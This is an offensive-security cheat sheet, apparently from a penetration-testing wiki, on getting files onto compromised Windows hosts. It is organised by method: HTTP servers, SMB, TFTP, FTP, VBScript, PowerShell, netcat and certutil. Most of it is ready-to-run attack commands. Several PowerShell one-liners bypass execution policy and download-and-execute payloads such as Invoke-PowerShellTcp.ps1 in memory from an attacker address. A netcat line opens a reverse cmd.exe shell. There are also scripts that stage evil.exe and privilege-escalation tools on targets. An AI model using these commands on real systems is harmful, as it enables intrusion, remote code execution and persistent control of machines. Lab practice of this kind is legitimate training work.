# Windows File Transfer

## **simple webserver** <a href="#id-0-simple-webserver" id="id-0-simple-webserver"></a>

***

#### | python 2.7 <a href="#python-27" id="python-27"></a>

```
python2 -m SimpleHTTPServer
```

#### | python3 <a href="#python3" id="python3"></a>

```
python3 -m http.server
```

#### | ruby <a href="#ruby" id="ruby"></a>

```
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
```

#### | php <a href="#php" id="php"></a>

```
php -S 0.0.0.0:8888
```

&#x20;

## **Smbsever (impacket)** <a href="#id-1-smbsever-impacket" id="id-1-smbsever-impacket"></a>

***

impacket-smbserver

copy \\\\\<ip>\\\<path>\\\<file>   # Linux to windows&#x20;

copy \<file> \\\\\<ip>\\\<path>\  # Windows to linux

#### | **kali:** <a href="#kali" id="kali"></a>

```
smbserver.py  myshare /tmp/smbshare -smb2
```

#### | **windows:** <a href="#windows" id="windows"></a>

```
net use M: \\<kali-ip>\myshare
```

```
\\10.10.10.1\privesc.exe  whoami 
```

## &#x20;**TFTP** <a href="#id-2-tftp" id="id-2-tftp"></a>

#### **hacker** <a href="#hacker" id="hacker"></a>

```
rootkali: mkdir /tftp
root@kali: atftpd --daemon --port 69 \tftp\
root@kali: cp nc.exe \tftp
```

#### | **target** <a href="#target" id="target"></a>

```
C:ProgramFiles\SLmail\System> tftp -i 192.168.30.5 GET nc.exe
```

&#x20;

## &#x20;**FTP** <a href="#id-3-ftp" id="id-3-ftp"></a>

***

#### | **hacker** <a href="#hacker" id="hacker"></a>

```
root@kali: apt-get install pure-ftpd
root@kali: cat setup-ftp
root@kali: ./setup-ftp
```

```
root@kali: cat ftp.commands
echo open 192.168.58.5 21 > ftp.txt
echo offsec>> ftp.txt
echo lab>> ftp.txt
echo bin>> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt 
```

## &#x20;**SCP** <a href="#id-4-scp" id="id-4-scp"></a>

***

```
scp <fileToUpload> user@remote:/path
```

### VBScript <a href="#vbscript" id="vbscript"></a>

Here is a good script to make a wget-clone in VB.

If it doesn't work try piping it through unix2dos before copying it.

```
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
```

You then execute the script like this:

```
cscript wget.vbs http://192.168.10.5/evil.exe evil.exe
```

## &#x20;PowerShell <a href="#id-5-vbscript" id="id-5-vbscript"></a>

***

#### | **Download File to path** <a href="#download-file-to-path" id="download-file-to-path"></a>

```
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "IEX(New-Object System.Net.WebClient).downloadFile('http://10.10.14.5/JuicyPotato.exe','C:\users\merlin\documents\potato.exe')"
```

```
echo IEX(New-Object System.Net.WebClient).downloadFile('http://10.10.10.3:8000/loli.txt','C:\Users\pelado\Desktop\loli.txt') | powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile
```

#### | **Download testfile and executes it in the memory** <a href="#download-testfile-and-executes-it-in-the-memory" id="download-testfile-and-executes-it-in-the-memory"></a>

```
powershell.exe  -nop -ep bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6/Invoke-PowerShellTcp.ps1')"
```

#### |**powershell full path:** <a href="#powershell-full-path" id="powershell-full-path"></a>

```
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe
```

#### | **powershell wget** <a href="#powershell-wget" id="powershell-wget"></a>

```
powershell wget "http://10.10.10.10/nc.exe" -outfile "nc.exe"
nc.exe -e cmd.exe 10.10.10.10 4444
```

### wget.psl <a href="#wgetpsl" id="wgetpsl"></a>

#### | **kali** <a href="#kali" id="kali"></a>

```
  echo $storageDir = $pwd > wget.psl
  echo $webclient = New-Object System.Net.WebClient >>wget.psl
  echo $url = "http://10.10.14.23:8000/PowerUp.ps1 >> wget.psl
  echo $file = "new-exploit.exe" >>wget.psl
  echo $webclient.DownloadFile($url,$file) >>wget.psl
```

#### | **target:** <a href="#target-3" id="target-3"></a>

```
C:\programs> copy y pasteo lo de arriba\\
C:\programs> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.psl \\
C:\programs> dir new-exploit.exe\\
 cool\\
```

## netcat

nc -lvp 1234 > \<out\_file>

nc \<ip> 1234 < \<in \_file>

## curl

curl \<url> -o outfile

## &#x20;**certutils** <a href="#id-7-certutils" id="id-7-certutils"></a>

***

#### | **windows** <a href="#windows" id="windows"></a>

```
certutil.exe -urlcache -split -f "http://ip-addr:port/file" [output-file]
```